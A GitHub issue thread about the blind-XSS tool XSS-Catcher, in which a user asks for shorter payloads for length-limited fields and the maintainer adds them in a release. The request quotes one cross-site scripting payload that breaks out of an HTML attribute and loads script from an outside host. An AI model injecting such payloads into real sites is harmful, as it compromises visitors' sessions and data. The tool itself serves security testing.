[Enhancement] Smaller Payloads

Question

[Enhancement] Smaller Payloads

Closed this issue 3 years ago · 5 comments

Hi, can we have supports for smaller payloads as well? lot of times the payload doesn't work just because the field is char limited by the server.

Would really like to see a payload like - "><script src=https://xss.domain.tld></script>

Answer 1 · 2021-09-02T12:25:18.000Z

I could add a default behaviour to the collector script to allow for shorter payloads. Will look into it!

Answer 2 · 2021-09-02T13:14:26.000Z

That would be amazing! Thank you.

Answer 3 · 2021-12-18T05:21:13.000Z

Hello @daxAKAhackerman, Did you added Shorter payload??

Answer 4 · 2021-12-18T15:28:02.000Z

Hey 👋 Not yet, I was working on lots of other projects 😅 However, I will have time to give a bit of love to XSS-Catcher during the Holidays, so stay tuned for a new release in the next few days 🎉

Answer 5 · 2021-12-18T21:50:37.000Z

This was not too complicated to achieve, so I was able to do it today 🥳 Have a look at the release notes for more details: https://github.com/daxAKAhackerman/XSS-Catcher/releases/tag/v1.7.0